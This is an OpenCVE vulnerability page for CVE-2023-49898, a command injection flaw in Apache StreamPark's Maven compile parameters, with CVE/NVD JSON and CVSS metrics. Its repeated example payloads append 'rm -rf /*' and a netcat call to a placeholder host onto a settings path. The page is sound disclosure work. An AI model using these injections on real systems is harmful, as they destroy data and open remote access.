CVE-2023-49898 - OpenCVE

Vendors	Products
Apache	Streampark

Link	Resource
https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3	Mailing List

{"dataType": "CVE_RECORD", "dataVersion": "5.0", "cveMetadata": {"cveId": "CVE-2023-49898", "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "state": "PUBLISHED", "assignerShortName": "apache", "dateReserved": "2023-12-01T03:12:29.421Z", "datePublished": "2023-12-15T12:13:25.086Z", "dateUpdated": "2023-12-15T12:13:25.086Z"}, "containers": {"cna": {"affected": [{"defaultStatus": "unaffected", "product": "Apache StreamPark (incubating)", "vendor": "Apache Software Foundation", "versions": [{"lessThan": "2.1.2", "status": "affected", "version": "2.0.0", "versionType": "custom"}]}], "descriptions": [{"lang": "en", "supportingMedia": [{"base64": false, "type": "text/html", "value": "<div>In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.<br><br><div>Mitigation:<br><br></div>all users <span style=\"background-color: var(--wht);\">should upgrade to 2.1.2</span><div><br></div><br><div>Example:<br><br><div><p></p><div>##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use \"||\" or \"&&\":<br><br><span style=\"background-color: var(--wht);\">/usr/share/java/maven-3/conf/settings.xml || rm -rf /*</span><br></div><p></p></div></div><div><div>/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &</div><br></div></div><p></p>"}], "value": "In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nMitigation:\n\nall users\u00a0should upgrade to 2.1.2\n\nExample:\n\n##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use \"||\" or \"&&\":\n\n/usr/share/java/maven-3/conf/settings.xml || rm -rf /*\n\n/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &\n\n"}], "metrics": [{"other": {"content": {"text": "low"}, "type": "Textual description of severity"}}], "problemTypes": [{"descriptions": [{"cweId": "CWE-77", "description": "CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')", "lang": "en", "type": "CWE"}]}], "providerMetadata": {"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09", "shortName": "apache", "dateUpdated": "2023-12-15T12:13:25.086Z"}, "references": [{"tags": ["vendor-advisory"], "url": "https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3"}], "source": {"discovery": "UNKNOWN"}, "title": "Apache StreamPark (incubating): Authenticated system users could trigger remote command execution", "x_generator": {"engine": "Vulnogram 0.1.0-dev"}}}}

{"configurations": [{"nodes": [{"cpeMatch": [{"criteria": "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*", "matchCriteriaId": "A5A4CCCF-F382-4FF8-AB13-9BE1B2B9757B", "versionEndExcluding": "2.1.2", "versionStartIncluding": "2.0.0", "vulnerable": true}], "negate": false, "operator": "OR"}]}], "descriptions": [{"lang": "en", "value": "In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nMitigation:\n\nall users\u00a0should upgrade to 2.1.2\n\nExample:\n\n##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use \"||\" or \"&&\":\n\n/usr/share/java/maven-3/conf/settings.xml || rm -rf /*\n\n/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &\n\n"}, {"lang": "es", "value": "En Streampark, hay un m\u00f3dulo de proyecto que integra las capacidades de compilaci\u00f3n de Maven. Sin embargo, no hay verificaci\u00f3n de los par\u00e1metros de compilaci\u00f3n de Maven. Permitir a los atacantes insertar comandos para la ejecuci\u00f3n remota de comandos. El requisito previo para un ataque exitoso es que el usuario debe iniciar sesi\u00f3n en el sistema Streampark y tener permisos a nivel del sistema. Generalmente, s\u00f3lo los usuarios de ese sistema tienen autorizaci\u00f3n para iniciar sesi\u00f3n y los usuarios no ingresar\u00edan manualmente un comando de operaci\u00f3n peligroso. Por tanto, el nivel de riesgo de esta vulnerabilidad es muy bajo. Mitigaci\u00f3n: todos los usuarios deben actualizar a 2.1.2 Ejemplo: ## Puede personalizar el m\u00e9todo de empalme seg\u00fan la situaci\u00f3n de compilaci\u00f3n del proyecto, los resultados de compilaci\u00f3n de mvn usan &&, los errores de compilaci\u00f3n usan \"||\" or \"&&\": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 & "}], "id": "CVE-2023-49898", "lastModified": "2024-01-05T20:00:50.767", "metrics": {"cvssMetricV31": [{"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary"}]}, "published": "2023-12-15T13:15:07.330", "references": [{"source": "security@apache.org", "tags": ["Mailing List"], "url": "https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3"}], "sourceIdentifier": "security@apache.org", "vulnStatus": "Analyzed", "weaknesses": [{"description": [{"lang": "en", "value": "CWE-77"}], "source": "security@apache.org", "type": "Primary"}]}

Attack Vector Network

Attack Complexity Low

Privileges Required High

Scope Unchanged

Confidentiality Impact High

Integrity Impact High

Availability Impact High

User Interaction None

Attack Vector Network

Attack Complexity Low

Privileges Required High

Scope Unchanged

Confidentiality Impact High

Integrity Impact High

Availability Impact High

User Interaction None

JSON object

JSON object

JSON object